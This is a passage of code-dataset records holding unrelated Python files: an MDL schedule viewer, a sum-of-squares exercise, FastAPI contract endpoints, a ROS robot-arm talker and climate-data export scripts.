ld_link_scores:\n for ran in rans_list:\n epoch = ran.epoch_ms\n for l in ran.links:\n if \"Link\" in d:\n if (int(l.src) == int(d['Link']['LinkSrc'])) and (int(l.dst) == int(d['Link']['LinkDst'])):\n score_link_with_no_relay(rans_list, l, d)\n elif int(l.src) == int(d['Link']['LinkSrc']):\n score_link_with_relay(rans_list, d, tmnsradio_list, l, epoch)\n else:\n if debug >= 1:\n print(\"No match of SRC or DST: this link is {0} --> {1}\\r\".format(l.src, l.dst))\n else:\n if debug >= 1:\n print(\"No match for key 'Link' in score file for link.\\r\")\n\n# ------------------------------------------------------------------------------\n\n\ndef run_schedule_viewer():\n global mdl_file\n global score_file\n global text_d\n global now\n global stdscr\n global ld_link_scores\n\n rans_list = []\n qos_policies_list = []\n tmnsradio_list = []\n\n\n # Parse MDL file, and create the RAN Config (assuming only a single RAN Config)\n mdl_parser = etree.XMLParser(remove_blank_text=True)\n root = etree.parse(mdl_file, mdl_parser)\n\n if debug >= 3:\n print(\"***** MDL FILE CONTENTS *****\")\n print(etree.tostring(root))\n print(\"***** END MDL FILE *****\")\n\n # Parse MDL file for Configuration Version\n root_name = root.find(\"mdl:Name\", namespaces=ns).text\n root_config_ver = root.find(\"mdl:ConfigurationVersion\", namespaces=ns).text\n\n # Parse MDL file for RAN Config Parameters\n rans = root.xpath(\"//mdl:RANConfiguration\", namespaces=ns)\n for ran in rans:\n rname = ran.find(\"mdl:Name\", namespaces=ns).text\n rid = ran.attrib['ID']\n rfreq = ran.find(\"mdl:CenterFrequencyHz\", namespaces=ns).text\n repoch = ran.find(\"mdl:EpochSize\", namespaces=ns).text\n rguard = float(ran.find(\"mdl:MaxGuardTimeSec\", namespaces=ns).text) * 1000\n if debug >= 2:\n print(\"RAN Name: {}, Frequency: {}, Epoch Size: {}ms, Guardband: {}ms\".format(rname, rfreq, repoch, rguard))\n new_ran = RanConfig(name=rname, id_attr=rid, freq=rfreq, epoch_ms=repoch, guard_ms=rguard)\n rans_list.append(new_ran)\n\n # Parse MDL file for TmNSRadio\n tmnsapp = root.xpath(\"//mdl:TmNSApp\", namespaces=ns)\n for app in tmnsapp:\n tid = app.attrib['ID']\n tname = app.find(\"mdl:Name\", namespaces=ns).text\n radio = app.find(\".//mdl:TmNSRadio\", namespaces=ns)\n if radio is not None:\n trfmacaddress = int(radio.find('.//mdl:RFMACAddress', namespaces=ns).text)\n radio_group_id = radio.find(\"mdl:JoinRadioGroupRefs/mdl:RadioGroupRef\", namespaces=ns).attrib['IDREF']\n rgs = root.xpath(\"//mdl:RadioGroup[@ID='{}']\".format(radio_group_id), namespaces=ns)\n rldst = int(rgs[0].find(\"mdl:GroupRFMACAddress\", namespaces=ns).text)\n # tlistening =int(radio.find('mdl:LinkAgent/mdl:ListeningPort', namespaces=ns).text)\n new_radio = TmNSRadio(id=tid, name=tname, rfmacaddress=trfmacaddress, listeningport=rldst, incoming_group_id=radio_group_id)\n tmnsradio_list.append(new_radio)\n\n # Parse MDL file for Radio Links and their associated Transmission Schedules\n radio_links = root.xpath(\"//mdl:RadioLink\", namespaces=ns)\n for radio_link in radio_links:\n rlname = radio_link.find(\"mdl:Name\", namespaces=ns).text\n rlid = radio_link.attrib['ID']\n rlsrc_idref = radio_link.find(\"mdl:SourceRadioRef\", namespaces=ns).attrib[\"IDREF\"]\n tmas = root.xpath(\"//mdl:TmNSApp[@ID='{}']\".format(rlsrc_idref), namespaces=ns)\n rlsrc = int(tmas[0].find(\"mdl:TmNSRadio/mdl:RFMACAddress\", namespaces=ns).text)\n rlsrc_group = tmas[0].find(\"mdl:TmNSRadio/mdl:JoinRadioGroupRefs/mdl:RadioGroupRef\", namespaces=ns).attrib[\"IDREF\"]\n ran_idref = 
tmas[0].find(\"mdl:TmNSRadio/mdl:RANConfigurationRef\", namespaces=ns).attrib['IDREF']\n rldst_idref = radio_link.find(\"mdl:DestinationRadioGroupRef\", namespaces=ns).attrib[\"IDREF\"]\n rgs = root.xpath(\"//mdl:RadioGroup[@ID='{}']\".format(rldst_idref), namespaces=ns)\n rldst = int(rgs[0].find(\"mdl:GroupRFMACAddress\", namespaces=ns).text)\n\n new_link = RadioLink(rlname, rlid, rlsrc, rlsrc_idref, rlsrc_group, rldst, rldst_idref)\n\n tx_sched = radio_link.find(\"mdl:TransmissionSchedule\", namespaces=ns)\n if tx_sched is not None:\n # Loop through the TxOps if they are defined for this link\n for txop in tx_sched:\n txop_freq = txop.find(\"mdl:CenterFrequencyHz\", namespaces=ns).text\n txop_start = txop.find(\"mdl:StartUSec\", namespaces=ns).text\n txop_stop = txop.find(\"mdl:StopUSec\", namespaces=ns).text\n txop_timeout = txop.find(\"mdl:TxOpTimeout\", namespaces=ns).text\n new_txop = TxOp(txop_freq, txop_start, txop_stop, txop_timeout)\n new_link.add_txop(new_txop)\n\n # Iterate through the list of RANs, and add the Link to the appropriate RAN\n for r in rans_list:\n if r.id == ran_idref:\n r.add_link(new_link)\n\n # Parse MDL file for QoS Policy Info (specifically, the max latency requirement)\n qos_policies = root.xpath(\"//mdl:QoSPolicy\", namespaces=ns)\n for qos_policy in qos_policies:\n # Find the max latency requirement for the policy\n latencies = qos_policy.findall(\".//mdl:AveragePacketDelay\", namespaces=ns)\n value_usec = 1000000.0\n for latency in latencies:\n temp_value_usec = float(latency.find(\"mdl:Value\", namespaces=ns).text)\n units = latency.find(\"mdl:BaseUnit\", namespaces=ns).text\n if units == \"Second\":\n temp_value_usec = temp_value_usec * 1000000\n if temp_value_usec < value_usec:\n value_usec = temp_value_usec\n\n qpname = qos_policy.find(\"mdl:Name\", namespaces=ns).text\n qpid = qos_policy.attrib['ID']\n qplmmc = qos_policy.find(\"mdl:LinkManagementMinCapacity/mdl:Value\", namespaces=ns).text\n qpac = qos_policy.find(\"mdl:AssuredCapacity/mdl:Value\", namespaces=ns).text\n qplmax = int(value_usec)\n new_qp = QoSPolicy(qpname, qpid, qplmmc, qpac, qplmax)\n qos_policies_list.append(new_qp)\n\n rlrefs = qos_policy.findall(\".//mdl:RadioLinkRef\", namespaces=ns)\n for rlref in rlrefs:\n for r in rans_list:\n for l in r.links:\n if l.id == rlref.attrib[\"IDREF\"]:\n l.qos_policy = qos_policies_list[-1]\n\n # Calculate Schedule Efficiency per RAN\n for r in rans_list:\n total_ran_tx_time_usec = 0\n ran_epoch_usec = int(r.epoch_ms) * 1000\n for l in r.links:\n for t in l.tx_sched:\n total_ran_tx_time_usec += t.duration_usec\n l.calc_max_latency(ran_epoch_usec) # Calculate Minimum Latency Requirement Achievable per link\n l.calc_alloc_bw_mbps(r.epoch_ms) # Calculate and set the Allocated Bandwidth per link\n\n r.efficiency_pct = (total_ran_tx_time_usec / ran_epoch_usec) * 100 # Calculate Schedule Efficiency per RAN\n r.check_guardbands() # Check for any guardband violations\n\n # Load JSON scoring file\n ld_link_scores = None\n if score_file is not None:\n try:\n with open(score_file) as f:\n ld_link_scores = json.load(f)\n except FileNotFoundError:\n if debug >= 1:\n print(\"JSON Score File Not Found!\\r\")\n # score_transmission_schedule(rans_list, ld_link_scores)\n\n score_transmission_schedule(rans_list, ld_link_scores, tmnsradio_list)\n\n write_report_to_json(rans_list)\n\n return rans_list, root_name, root_config_ver\n\n\n# ------------------------------------------------------------------------------\n\n\ndef main(stdscr): \n global mdl_file\n global 
text_d\n global now\n\n init_text_colors()\n\n stdscr.bkgd(text_d['BG'])\n banner_pad.bkgd(text_d['BG'])\n toolbar_pad.bkgd(text_d['BG'])\n file_info_pad.bkgd(text_d['BG'])\n ran_pad.bkgd(text_d['BG'])\n link_info_pad.bkgd(text_d['BG'])\n epoch_pad.bkgd(text_d['BG'])\n txop_display_pad.bkgd(text_d['BG'])\n stdscr.clear()\n stdscr.refresh()\n\n rans_list, root_name, root_config_ver = run_schedule_viewer()\n\n # Initialize print loop variables\n num_rans = len(rans_list)\n ran_idx = 1\n\n # Begin print loop; Loop until user quits application\n while True:\n height, width = stdscr.getmaxyx()\n\n stdscr.clear()\n stdscr.refresh()\n\n # Sanity check for window height requirements\n if height < 10:\n print_too_short(width)\n elif width < 50:\n print_too_skinny(width)\n else:\n print_banner()\n print_file_info(mdl_file, root_name, root_config_ver, score_file)\n if num_rans > 0:\n print_ran_stats(rans_list[ran_idx-1])\n if len(rans_list[ran_idx-1].links) > 0:\n print_links_info(rans_list[ran_idx-1].links, num_rans)\n print_txops_in_all_rans(rans_list, (ran_idx-1))\n print_toolbar()\n stdscr.refresh()\n\n keypress = stdscr.getkey() # Wait for user to press a key\n if keypress.isdigit():\n ran_idx = int(keypress)\n elif keypress == 'q':\n break\n\n if ran_idx == 0:\n ran_idx = 1\n if ran_idx > len(rans_list):\n ran_idx = len(rans_list)\n\n# ------------------------------------------------------------------------------\n\n\ndef no_gui():\n return 0\n\n\nif __name__ == \"__main__\":\n now = time.strftime(\"%Y%m%d_%H%M%S\")\n # Argument Parser Declarations\n parser = argparse.ArgumentParser()\n parser.add_argument('FILE', action='store', default=sys.stdin, help='MDL file to examine', type=str)\n parser.add_argument('-s', action='store', default=None, dest='SCORE',\n help='JSON file to score MDL file performance', type=str)\n parser.add_argument('-d', action='store', default=0, dest='debug', help='Set the Debug level', type=int)\n parser.add_argument('-v', '--version', action='version', version='%(prog)s 0.4.1')\n parser.add_argument('-H', action='store_true', dest='HEADLESS', help='Runs Schedule Viewer in headless mode. Useful generating score.')\n parser.add_argument('--database', action='store', default=None, dest='DATABASE', help='Set Name of OrientDB database. 
If set the MDL file will be exported from the OrientDB database', type=str)\n parser.add_argument('--config', action='store', default=None, dest='CONFIG', help='Set config.json for OrientDB', type=str)\n cli_args = parser.parse_args()\n\n # CLI argument assignments\n\n mdl_file = cli_args.FILE\n score_file = cli_args.SCORE\n headless = cli_args.HEADLESS\n mod_name = None\n debug = cli_args.debug\n if cli_args.DATABASE is not None or cli_args.CONFIG is not None:\n from brass_api.translator.orientdb_exporter import OrientDBXMLExporter as MDLExporter\n database = cli_args.DATABASE\n configFile = cli_args.CONFIG\n exporter = MDLExporter(database, mdl_file, configFile)\n exporter.export_xml()\n if headless:\n run_schedule_viewer()\n if not headless:\n text_d = {}\n border_d = {}\n\n stdscr = curses.initscr()\n banner_pad = curses.newpad(4, 106) # Initialize Banner Pad\n toolbar_pad = curses.newpad(3, 106) # Initialize Toolbar Pad\n file_info_pad = curses.newpad(6, 102) # Initialize File Info Pad\n ran_pad = curses.newpad(5, 102) # Initialize RAN Pad\n link_info_pad = curses.newpad(8, 102) # Initialize Link Info Pad\n epoch_pad = curses.newpad(10, 102) # Initialize Epoch Pad\n txop_display_pad = curses.newpad(1, 100) # Initialize TxOp Display Pad\n\n if os.name == 'nt': # If running on Windows, disable the \"blinking\" feature of curses\n BLINK = 0 # because it doesn't look very good. Also disabling the \"bold\" feature\n BOLD = 0 # because it changes the color on Windows\n else:\n BLINK = curses.A_BLINK\n BOLD = curses.A_BOLD\n wrapper(main)\n","sub_path":"Scenarios/FlightTesting/Utilities/TxOpScheduleViewer/TxOpSchedViewer.py","file_name":"TxOpSchedViewer.py","file_ext":"py","file_size_in_byte":53908,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"323325138","text":"#PF-Prac-32\r\n#import math\r\ndef check_squares(number):\r\n #start writing your code here\r\n limit=int(number**0.5)+1\r\n print(limit)\r\n for i in range(1,limit):\r\n for j in range(1,limit):\r\n res=(i**2)+(j**2)\r\n if(res==number):\r\n return True\r\n return False\r\nnumber=13\r\nprint(check_squares(number))\r\n#rayanfer32\r\n","sub_path":"check_squares.py","file_name":"check_squares.py","file_ext":"py","file_size_in_byte":364,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"305022086","text":"from datetime import datetime, date\nfrom dateutil.relativedelta import relativedelta\nimport holidays\nimport pandas\nimport json\nimport math\n\nfrom typing import Any, List, Optional, Dict\n\nfrom fastapi import APIRouter, Depends, HTTPException, Query, Request, Response\nfrom sqlalchemy.orm import Session\n\nfrom app import crud, models, schemas\nfrom app.api import deps\n\nrouter = APIRouter()\n\n\n@router.get(\"/\", response_model=List[schemas.Contract])\ndef read_contracts(\n db: Session = Depends(deps.get_db),\n skip: int = 0,\n limit: int = 100,\n current_user: models.User = Depends(deps.get_current_active_user),\n) -> Any:\n \"\"\"\n Retrieve contracts.\n \"\"\"\n if crud.user.is_superuser(current_user):\n contracts = crud.contract.get_multi(db, skip=skip, limit=limit)\n else:\n contracts = crud.contract.get_multi_by_user(\n db=db, user_id=current_user.id, skip=skip, limit=limit\n )\n # for contract in contracts:\n # tmp = json.loads(contract[\"weekdays\"])\n # contract[\"weekdays\"] = tmp\n return contracts\n\n\n@router.post(\"/\", response_model=schemas.Contract)\ndef create_contract(\n *,\n db: Session = 
Depends(deps.get_db),\n contract_in: schemas.ContractCreate,\n current_user: models.User = Depends(deps.get_current_active_user),\n user_id: str,\n) -> Any:\n \"\"\"\n Create a new contract.\n \"\"\"\n if (int(current_user.id) == int(user_id)) or bool(current_user.is_superuser):\n if crud.user.get(db, id=user_id):\n pass\n else:\n raise HTTPException(status_code=400, detail=\"User not found\")\n else:\n raise HTTPException(status_code=400, detail=\"User not responsible\")\n contract = crud.contract.create_with_owner(\n db=db, obj_in=contract_in, user_id=user_id)\n return contract\n\n\n@router.put(\"/{id}\", response_model=schemas.Contract)\ndef update_contract(\n *,\n db: Session = Depends(deps.get_db),\n id: int,\n contract_in: schemas.ContractUpdate,\n current_user: models.User = Depends(deps.get_current_active_user),\n) -> Any:\n \"\"\"\n Update a contract.\n \"\"\"\n contract = crud.contract.get(db=db, id=id)\n if not contract:\n raise HTTPException(status_code=404, detail=\"Contract not found\")\n if (not crud.user.is_superuser(current_user) and\n (contract.user_id != current_user.id)):\n raise HTTPException(status_code=400, detail=\"Not enough permissions\")\n contract = crud.contract.update(db=db, db_obj=contract, obj_in=contract_in)\n return contract\n\n\n@router.get(\"/{id}\", response_model=schemas.Contract)\ndef read_contract(\n *,\n db: Session = Depends(deps.get_db),\n id: int,\n current_user: models.User = Depends(deps.get_current_active_user),\n) -> Any:\n \"\"\"\n Get a contract by ID.\n \"\"\"\n contract = crud.contract.get(db=db, id=id)\n if not contract:\n raise HTTPException(status_code=404, detail=\"Contract not found\")\n if (not crud.user.is_superuser(current_user) and\n (contract.user_id != current_user.id)):\n raise HTTPException(status_code=400, detail=\"Not enough permissions\")\n return contract\n\n\n@router.delete(\"/{id}\", response_model=schemas.ContractDelete)\ndef delete_contract(\n *,\n db: Session = Depends(deps.get_db),\n id: int,\n current_user: models.User = Depends(deps.get_current_active_user),\n) -> Any:\n \"\"\"\n Delete a contract.\n \"\"\"\n contract = crud.contract.get(db=db, id=id)\n if not contract:\n raise HTTPException(status_code=404, detail=\"Contract not found\")\n if (not crud.user.is_superuser(current_user) and\n (contract.user_id != current_user.id)):\n raise HTTPException(status_code=400, detail=\"Not enough permissions\")\n contract = crud.contract.remove(db=db, id=id)\n return contract\n","sub_path":"app/api/api_v1/endpoints/contracts.py","file_name":"contracts.py","file_ext":"py","file_size_in_byte":3821,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
{"seq_id":"118273685","text":"#!/usr/bin/env python\n# Software License Agreement (BSD License)\n#\n# Copyright (c) 2008, Willow Garage, Inc.\n# All rights reserved.\n#\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions\n# are met:\n#\n# * Redistributions of source code must retain the above copyright\n# notice, this list of conditions and the following disclaimer.\n# * Redistributions in binary form must reproduce the above\n# copyright notice, this list of conditions and the following\n# disclaimer in the documentation and/or other materials provided\n# with the distribution.\n# * Neither the name of Willow Garage, Inc. 
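The four handlers above repeat the same fetch-then-authorize check. A hedged sketch of hoisting it into one helper; get_owned_contract is an illustrative name, while `crud` and `HTTPException` are the objects already imported in this module:

from fastapi import HTTPException

def get_owned_contract(db, id: int, current_user):
    # 404 if the contract is missing, 400 unless the caller owns it or is
    # a superuser -- exactly the checks repeated in each handler above.
    contract = crud.contract.get(db=db, id=id)
    if not contract:
        raise HTTPException(status_code=404, detail="Contract not found")
    if (not crud.user.is_superuser(current_user)
            and contract.user_id != current_user.id):
        raise HTTPException(status_code=400, detail="Not enough permissions")
    return contract

# e.g. update_contract() would reduce to:
#     contract = get_owned_contract(db, id, current_user)
#     return crud.contract.update(db=db, db_obj=contract, obj_in=contract_in)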
nor the names of its\n# contributors may be used to endorse or promote products derived\n# from this software without specific prior written permission.\n#\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS\n# \"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT\n# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS\n# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE\n# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,\n# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,\n# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;\n# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER\n# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT\n# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN\n# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE\n# POSSIBILITY OF SUCH DAMAGE.\n#\n# Revision $Id\n\n## Simple talker demo that published std_msgs/Strings messages\n## to the 'chatter' topic\n\nfrom casadi import *\nimport rospy\nimport roslib; roslib.load_manifest('visualization_marker_tutorials')\nfrom sensor_msgs.msg import JointState\nfrom std_msgs.msg import Header\nfrom visualization_msgs.msg import Marker\nfrom visualization_msgs.msg import MarkerArray\nimport mpc_fatigue.pynocchio_casadi as pin\nimport numpy as np\nimport math\n\n\n\n\ndef talker(q1,q2,F,box):\n\n #Load URDF\n pilz_first_urdf = rospy.get_param('/robot_description_1')\n pilz_second_urdf = rospy.get_param('/robot_description_2')\n\n # ---------------------- Solve forward kinematics pilz 1 ---------------------\n #Postion of link 5 in cartesian space (Solution to direct kinematics)\n fk_first_string = pin.generate_forward_kin(pilz_first_urdf, 'prbt_link_5')\n #Create casadi function\n fk_first = casadi.Function.deserialize(fk_first_string)\n\n # ---------------------- Solve forward kinematics pilz 2 ---------------------\n #Postion of link 5 in cartesian space (Solution to direct kinematics)\n fk_second_string = pin.generate_forward_kin(pilz_second_urdf, 'prbt_link_5')\n #Create casadi function\n fk_second = casadi.Function.deserialize(fk_second_string)\n\n #Define the talker parameters\n if True: \n pub = rospy.Publisher('topic_position_from_invkin', JointState, queue_size=100) # This can be seen in rostopic list\n rospy.init_node('node_position_from_invkin') #This can be seen in rosnode list\n hello_str = JointState()\n hello_str.header = Header()\n hello_str.header.stamp = rospy.Time.now()\n hello_str.name = ['prbt_joint_1','prbt_joint_2','prbt_joint_3','prbt_joint_4','prbt_joint_5','prbt_joint_6','sec_prbt_joint_1','sec_prbt_joint_2','sec_prbt_joint_3','sec_prbt_joint_4','sec_prbt_joint_5','sec_prbt_joint_6']\n hello_str.position = []\n hello_str.velocity = []\n hello_str.effort = []\n rate = rospy.Rate(10) # 10hz\n i = 0\n qsize = np.size(q1[0])\n fsize = np.size(F[0])\n\n #Define the marker plotter\n if True:\n \n topic = 'visualization_marker_array'\n publisher_1 = rospy.Publisher(topic, MarkerArray,queue_size=100)\n publisher_2 = rospy.Publisher(topic, MarkerArray,queue_size=100)\n publisher_3 = rospy.Publisher(topic, MarkerArray,queue_size=100)\n #rospy.init_node('register')\n markerArray = MarkerArray()\n \n marker_f = Marker()\n marker_s = Marker()\n weight = Marker()\n marker_f.header.frame_id = \"/prbt_base\"\n marker_s.header.frame_id = \"/prbt_base\"\n weight.header.frame_id = \"/prbt_base\"\n marker_f.ns = \"Fz_forces\";\n marker_s.ns = 
\"Fz_forces\";\n weight.ns = \"Fz_forces\";\n marker_f.type = marker_f.ARROW\n marker_s.type = marker_s.ARROW\n weight.type = marker_s.ARROW\n marker_f.action = marker_f.ADD\n marker_s.action = marker_s.ADD\n weight.action = weight.ADD\n marker_f.id = 0;\n marker_s.id = 1;\n weight.id = 2;\n #Scales\n marker_f.scale.x = 0.2\n marker_s.scale.x = 0.2\n weight.scale.x = 0.2\n\n marker_f.scale.y = 0.02\n marker_s.scale.y = 0.02\n weight.scale.y = 0.02\n\n marker_f.scale.z = 0.02\n marker_s.scale.z = 0.02\n weight.scale.z = 0.02\n\n marker_f.color.a = 1.0\n marker_f.color.r = 1.0\n marker_f.color.g = 1.0\n marker_f.color.b = 1.0\n\n marker_s.color.a = 1.0\n marker_s.color.r = 1.0\n marker_s.color.g = 1.0\n marker_s.color.b = 1.0\n\n weight.color.a = 1.0\n weight.color.r = 1.0\n weight.color.g = 1.0\n weight.color.b = 1.0\n\n\n marker_f.pose.orientation.x = 0.0\n marker_f.pose.orientation.y = 1.0\n marker_f.pose.orientation.z = 0.0\n marker_f.pose.orientation.w = -1.0\n\n marker_s.pose.orientation.x = 0.0\n marker_s.pose.orientation.y = 1.0\n marker_s.pose.orientation.z = 0.0\n marker_s.pose.orientation.w = -1.0\n\n weight.pose.orientation.x = 0.0\n weight.pose.orientation.y = 1.0\n weight.pose.orientation.z = 0.0\n weight.pose.orientation.w = 1.0\n\n while not rospy.is_shutdown():\n if i < qsize:\n\n if i < fsize:\n qf = [q1[0][i],q1[1][i],q1[2][i],q1[3][i],q1[4][i],q1[5][i]]\n qs = [q2[0][i],q2[1][i],q2[2][i],q2[3][i],q2[4][i],q2[5][i]]\n pos_Fzf = fk_first(q = qf)['ee_pos']\n pos_Fzs = fk_second(q = qs)['ee_pos']\n #Marker scales\n marker_f.scale.x = 0.2*F[0][i]/F[2]\n marker_s.scale.x = 0.2*F[1][i]/F[2]\n weight.scale.x = 0.2*(F[1][i] + F[0][i]) /F[2]\n\n # Marker f position \n marker_f.pose.position.x = pos_Fzf[0]+0.1\n marker_f.pose.position.y = pos_Fzf[1]\n marker_f.pose.position.z = pos_Fzf[2]\n\n marker_s.pose.position.x = pos_Fzs[0]-0.1\n marker_s.pose.position.y = pos_Fzs[1]\n marker_s.pose.position.z = pos_Fzs[2]\n\n weight.pose.position.x = box[0][i]\n weight.pose.position.y = box[1][i]\n weight.pose.position.z = box[2][i]\n\n\n pub.publish(hello_str)\n publisher_1.publish([marker_f])\n publisher_2.publish([marker_s])\n publisher_3.publish([weight])\n rate.sleep()\n hello_str.header.stamp = rospy.Time.now()\n hello_str.position = [q1[0][i],q1[1][i],q1[2][i],q1[3][i],q1[4][i],q1[5][i],q2[0][i],q2[1][i],q2[2][i],q2[3][i],q2[4][i],q2[5][i]] \n \n else:\n marker_f.action = marker_f.DELETE\n marker_s.action = marker_s.DELETE\n weight.action = weight.DELETE\n publisher_1.publish([marker_f])\n publisher_2.publish([marker_s])\n publisher_3.publish([weight])\n break\n i += 1\n \n\nif __name__ == '__main__':\n try:\n talker()\n except rospy.ROSInterruptException:\n pass\n","sub_path":"talkers/2_pilz_6_DOF/two_pilz_talker_inv_dyn_6DOF.py","file_name":"two_pilz_talker_inv_dyn_6DOF.py","file_ext":"py","file_size_in_byte":7804,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"480480747","text":"from pathlib import Path\n\nimport sys\nsys.path.append('..')\nfrom src.exporters import (ERA5Exporter, VHIExporter,\n CHIRPSExporter, ERA5ExporterPOS,\n GLEAMExporter, ESACCIExporter,\n S5Exporter, SRTMExporter, KenyaAdminExporter)\n\n\ndef export_era5():\n # if the working directory is alread ml_drought don't need ../data\n if Path('.').absolute().as_posix().split('/')[-1] == 'ml_drought':\n data_path = Path('data')\n else:\n data_path = Path('../data')\n exporter = ERA5Exporter(data_path)\n\n # The ERA5 exporter downloads the data with wierd 
names.\n # A mapping of actual variables to the downloaded variable\n # names is recorded here\n name2var = {\n 'precip': 'precip',\n 'evaporation': 'e',\n 'mean_eastward_turbulent_surface_stress': 'metss',\n 'mean_northward_turbulent_surface_stress': 'mntss',\n 'potential_evaporation': 'pev',\n 'slhf': 'surface_latent_heat_flux',\n 'sp': 'surface_pressure',\n 'sshf': 'surface_sensible_heat_flux',\n 'ssrc': 'surface_net_solar_radiation_clear_sky',\n 'stl1': 'soil_temperature_level_1',\n 'strc': 'surface_net_thermal_radiation_clear_sky',\n 'swvl1': 'volumetric_soil_water_layer_1',\n 'swvl2': 'volumetric_soil_water_layer_2',\n 'swvl3': 'volumetric_soil_water_layer_3',\n 'swvl4': 'volumetric_soil_water_layer_4',\n 't2m': '2m_temperature',\n 'u10': '10m_u_component_of_wind',\n 'v10': '10m_v_component_of_wind',\n 'p84.162': 'vertical_integral_of_divergence_of_moisture_flux',\n 'VCI': 'VCI'\n }\n\n era5_variables = [\n '10m_u_component_of_wind', '10m_v_component_of_wind', 'volumetric_soil_water_layer_1',\n 'volumetric_soil_water_layer_2', 'volumetric_soil_water_layer_3',\n 'volumetric_soil_water_layer_4', 'surface_pressure', 'surface_sensible_heat_flux',\n 'surface_latent_heat_flux', 'soil_temperature_level_1', '2m_temperature',\n 'mean_eastward_turbulent_surface_stress', 'mean_northward_turbulent_surface_stress',\n 'surface_net_solar_radiation_clear_sky', 'surface_net_thermal_radiation_clear_sky',\n 'vertical_integral_of_divergence_of_moisture_flux', 'potential_evaporation',\n 'evaporation'\n ]\n\n for variable in era5_variables:\n exporter.export(variable=variable, granularity='monthly')\n\n\ndef export_vhi():\n # if the working directory is alread ml_drought don't need ../data\n if Path('.').absolute().as_posix().split('/')[-1] == 'ml_drought':\n data_path = Path('data')\n else:\n data_path = Path('../data')\n exporter = VHIExporter(data_path)\n\n exporter.export()\n\n\ndef export_chirps():\n # if the working directory is alread ml_drought don't need ../data\n if Path('.').absolute().as_posix().split('/')[-1] == 'ml_drought':\n data_path = Path('data')\n else:\n data_path = Path('../data')\n exporter = CHIRPSExporter(data_path)\n\n exporter.export(years=None, region='global', period='monthly')\n\n\ndef export_era5POS():\n # if the working directory is alread ml_drought don't need ../data\n if Path('.').absolute().as_posix().split('/')[-1] == 'ml_drought':\n data_path = Path('data')\n else:\n data_path = Path('../data')\n exporter = ERA5ExporterPOS(data_path)\n\n exporter.export(variable='precipitation_amount_1hour_Accumulation')\n\n\ndef export_gleam():\n # if the working directory is alread ml_drought don't need ../data\n if Path('.').absolute().as_posix().split('/')[-1] == 'ml_drought':\n data_path = Path('data')\n else:\n data_path = Path('../data')\n\n exporter = GLEAMExporter(data_folder=data_path)\n exporter.export(['E', 'SMroot', 'SMsurf'], 'monthly')\n\n\ndef export_srtm():\n # if the working directory is alread ml_drought don't need ../data\n if Path('.').absolute().as_posix().split('/')[-1] == 'ml_drought':\n data_path = Path('data')\n else:\n data_path = Path('../data')\n\n exporter = SRTMExporter(data_folder=data_path)\n exporter.export()\n\n\ndef export_esa():\n # if the working directory is alread ml_drought don't need ../data\n if Path('.').absolute().as_posix().split('/')[-1] == 'ml_drought':\n data_path = Path('data')\n else:\n data_path = Path('../data')\n\n exporter = ESACCIExporter(data_folder=data_path)\n exporter.export()\n\n\ndef export_s5():\n # if the working 
directory is alread ml_drought don't need ../data\n if Path('.').absolute().as_posix().split('/')[-1] == 'ml_drought':\n data_path = Path('data')\n else:\n data_path = Path('../data')\n\n granularity = 'hourly'\n pressure_level = False\n\n exporter = S5Exporter(\n data_folder=data_path,\n granularity=granularity,\n pressure_level=pressure_level,\n )\n variable = 'total_precipitation'\n min_year = 1993\n max_year = 2014\n min_month = 1\n max_month = 12\n max_leadtime = None\n pressure_levels = [200, 500, 925]\n n_parallel_requests = 20\n\n exporter.export(\n variable=variable,\n min_year=min_year,\n max_year=max_year,\n min_month=min_month,\n max_month=max_month,\n max_leadtime=max_leadtime,\n pressure_levels=pressure_levels,\n n_parallel_requests=n_parallel_requests,\n )\n\n\ndef export_kenya_boundaries():\n # if the working directory is alread ml_drought don't need ../data\n if Path('.').absolute().as_posix().split('/')[-1] == 'ml_drought':\n data_path = Path('data')\n else:\n data_path = Path('../data')\n\n exporter = KenyaAdminExporter(data_path)\n exporter.export()\n\n\nif __name__ == '__main__':\n export_era5()\n export_vhi()\n export_chirps()\n export_era5POS()\n export_gleam()\n export_esa()\n export_s5()\n export_kenya_boundaries()\n","sub_path":"scripts/export.py","file_name":"export.py","file_ext":"py","file_size_in_byte":5877,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"523884698","text":"from one.api import ONE\nimport numpy as np\nfrom scipy.special import digamma, betainc, logsumexp\nimport pickle\nimport os, sys\nfrom itertools import accumulate\nimport sobol_seq\nfrom scipy.stats import truncnorm, norm\n\ndef format_input(stimuli_arr, actions_arr, stim_sides_arr):\n # get maximum number of trials across sessions\n max_len = np.array([len(stimuli_arr[k]) for k in range(len(stimuli_arr))]).max()\n # pad with 0 such that we obtain nd arrays of size nb_sessions x nb_trials and convert to arrays\n stimuli = np.array([np.concatenate((stimuli_arr[k], np.zeros(max_len-len(stimuli_arr[k])))) for k in range(len(stimuli_arr))])\n actions = np.array([np.concatenate((actions_arr[k], np.zeros(max_len-len(actions_arr[k])))) for k in range(len(actions_arr))])\n stim_side = np.array([np.concatenate((stim_sides_arr[k], np.zeros(max_len-len(stim_sides_arr[k])))) for k in range(len(stim_sides_arr))])\n return stimuli, actions, stim_side\n\ndef look_up(dic, key, val):\n if key in dic.keys(): \n return dic[key]\n else:\n return val\n\ndef generate_stim():\n one = 